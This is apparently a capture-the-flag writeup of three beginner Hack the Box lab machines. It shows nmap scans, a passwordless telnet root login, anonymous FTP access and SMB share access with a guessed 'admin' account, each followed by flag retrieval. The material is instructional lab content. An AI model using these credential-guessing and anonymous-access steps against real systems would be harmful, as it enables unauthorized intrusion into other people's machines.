Meow, Fawn, & Dancing Writeup

Starting Point on Hack the Box (HTB) is broken down into tiers and there are three. The first get the user familiar with the HTB interface. It also gets the user familiar with terminology and the pen testing mindset. Below is a short writeup for the first three tier 0 boxes.


Meow

Initial Recon

Ran a quick nmap scan against the box.

┌──(crimson㉿crimson)-[~/HTB/Starting Point]
└─$ nmap -sC -sV $tgt
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-15 23:25 CDT
Nmap scan report for 10.129.81.56
Host is up (0.049s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
23/tcp open  telnet  Linux telnetd
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.12 seconds

Looking at the results shows a single port open – telnet on port 23.

Initial Access

Telnet

What is telnet? It is an application protocol that allows remote access to a host. Similar to Secure Shell (SSH) that is commonly seen on port 22. The main difference between the two is telnet traffic is in clear text and SSH is encrypted.

Telnet can be accessed using the telnet command. The only required argument is the remote system’s IP. Once connected, the remote host asks for a username. With a few guesses I find one that works and it happens to be root. Once authenticated simply list the available files and there is flag.txt, easy enough!

┌──(crimson㉿crimson)-[~/HTB/Starting Point]
└─$ telnet $tgt                                                                                                 1 ⨯
Trying 10.129.81.56...
Connected to 10.129.81.56.
Escape character is '^]'.

  █  █         ▐▌     ▄█▄ █          ▄▄▄▄
  █▄▄█ ▀▀█ █▀▀ ▐▌▄▀    █  █▀█ █▀█    █▌▄█ ▄▀▀▄ ▀▄▀
  █  █ █▄█ █▄▄ ▐█▀▄    █  █ █ █▄▄    █▌▄█ ▀▄▄▀ █▀█


Meow login: root
Welcome to Ubuntu 20.04.2 LTS (GNU/Linux 5.4.0-77-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Mon 16 May 2022 04:30:05 AM UTC

  System load:           0.0
  Usage of /:            41.7% of 7.75GB
  Memory usage:          4%
  Swap usage:            0%
  Processes:             138
  Users logged in:       0
  IPv4 address for eth0: 10.129.81.56
  IPv6 address for eth0: dead:beef::250:56ff:feb9:ed8e

 * Super-optimized for small spaces - read how we shrank the memory
   footprint of MicroK8s to make it the smallest full K8s around.

   https://ubuntu.com/blog/microk8s-memory-optimisation

75 updates can be applied immediately.
31 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Mon May 16 04:26:31 UTC 2022 on pts/0
root@Meow:~# ls -la
total 36
drwx------  5 root root 4096 Jun 18  2021 .
drwxr-xr-x 20 root root 4096 Jul  7  2021 ..
lrwxrwxrwx  1 root root    9 Jun  4  2021 .bash_history -> /dev/null
-rw-r--r--  1 root root 3132 Oct  6  2020 .bashrc
drwx------  2 root root 4096 Apr 21  2021 .cache
-rw-r--r--  1 root root   33 Jun 17  2021 flag.txt
drwxr-xr-x  3 root root 4096 Apr 21  2021 .local

Fawn

Initial Recon

Ran a quick nmap scan.

┌──(crimson㉿crimson)-[~/HTB/Starting Point/Fawn]
└─$ nmap -sC -sV $tgt
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-15 23:40 CDT
Nmap scan report for 10.129.1.14
Host is up (0.061s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0              32 Jun 04  2021 flag.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.10.14.2
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 3.17 seconds

Looking at the results shows a single port open – File Transfer Protocol (FTP) on port 21.

Initial Access

FTP

What is FTP? It is a protocol that facilitates the transfer of files between a client and server.

To connect to the FTP server simply use the ftp command. The only required argument is the remote system’s IP. Looking at our nmap scan shows that an anonymous FTP login is allowed so I do just that.

The username is anonymous and for the password press ENTER. After listing what files are in the current directory I see flag.txt. Using the get command I can pull that file down from the FTP server and to my attacking box. From there simply cat the file.

┌──(crimson㉿crimson)-[~/HTB/Starting Point/Fawn]
└─$ ftp $tgt   
Connected to 10.129.1.14.
220 (vsFTPd 3.0.3)
Name (10.129.1.14:crimson): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||50222|)
150 Here comes the directory listing.
-rw-r--r--    1 0        0              32 Jun 04  2021 flag.txt
226 Directory send OK.
ftp> get flag.txt
local: flag.txt remote: flag.txt
229 Entering Extended Passive Mode (|||49255|)
150 Opening BINARY mode data connection for flag.txt (32 bytes).
100% |**********************************************************************|    32       21.64 KiB/s    00:00 ETA
226 Transfer complete.
32 bytes received in 00:00 (0.63 KiB/s)
ftp> exit
221 Goodbye.

┌──(crimson㉿crimson)-[~/HTB/Starting Point/Fawn]
└─$ ll
total 4
-rw-r--r-- 1 crimson crimson 32 Jun  3  2021 flag.txt

┌──(crimson㉿crimson)-[~/HTB/Starting Point/Fawn]
└─$ 

Dancing

Initial Recon

Started with a nmap scan.

┌──(crimson㉿crimson)-[~/HTB/Starting Point]
└─$ nmap -sC -sV $tgt
Starting Nmap 7.92 ( https://nmap.org ) at 2022-05-15 23:46 CDT
Nmap scan report for 10.129.1.12
Host is up (0.053s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT    STATE SERVICE       VERSION
135/tcp open  msrpc         Microsoft Windows RPC
139/tcp open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp open  microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2022-05-16T08:46:44
|_  start_date: N/A
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled but not required
|_clock-skew: 4h00m00s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.43 seconds

There are a few open ports – Microsoft Remote Procedure Call (RPC) on 135, NetBIOS on port 139, and Server Message Block (SMB) on port 445.

Initial Access

SMB

What is SMB? It is a communication protocol created by Microsoft that facilitates shared access of files between hosts. For example, a server can have a share with files that other clients in the network can access remotely.

To list shares on a remote system with Kali Linux, use the smbclient command. In this scenario -U is used to specify a username. -N forces no password to be used. And -L gets a list of available shares from the specified host. After trying common usernames and passwords I came across valid credentials with the username admin and no password.

┌──(crimson㉿crimson)-[~/HTB/Starting Point]
└─$ smbclient -U 'admin' -N -L \\$tgt

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        WorkShares      Disk      
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.129.1.12 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

The first three shares listed are common Windows shares. The last, WorkShares, is not. Using smbclient I can also access shares. To access a remote share I must provide valid credentials and the sharename.

After successfully connecting, I can use the dir command to list files. Eventually I find flag.txt. To pull that file from the SMB share to my local attacking box I use the get command. Once it is downloaded I can cat the file on my local system.

┌──(crimson㉿crimson)-[~/HTB/Starting Point]
└─$ smbclient -U 'admin' -N \\\\$tgt\\WorkShares
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Mon Mar 29 03:22:01 2021
  ..                                  D        0  Mon Mar 29 03:22:01 2021
  Amy.J                               D        0  Mon Mar 29 04:08:24 2021
  James.P                             D        0  Thu Jun  3 03:38:03 2021

                5114111 blocks of size 4096. 1732437 blocks available
smb: \> dir Amy.J\
  .                                   D        0  Mon Mar 29 04:08:24 2021
  ..                                  D        0  Mon Mar 29 04:08:24 2021
  worknotes.txt                       A       94  Fri Mar 26 06:00:37 2021

                5114111 blocks of size 4096. 1732055 blocks available
smb: \> get Amy.J\worknotes.txt 
getting file \Amy.J\worknotes.txt of size 94 as Amy.J\worknotes.txt (0.4 KiloBytes/sec) (average 0.4 KiloBytes/sec)
smb: \> dir James.P\
  .                                   D        0  Thu Jun  3 03:38:03 2021
  ..                                  D        0  Thu Jun  3 03:38:03 2021
  flag.txt                            A       32  Mon Mar 29 04:26:57 2021

                5114111 blocks of size 4096. 1732026 blocks available
smb: \> get James.P\flag.txt 
getting file \James.P\flag.txt of size 32 as James.P\flag.txt (0.1 KiloBytes/sec) (average 0.3 KiloBytes/sec)
smb: \> exit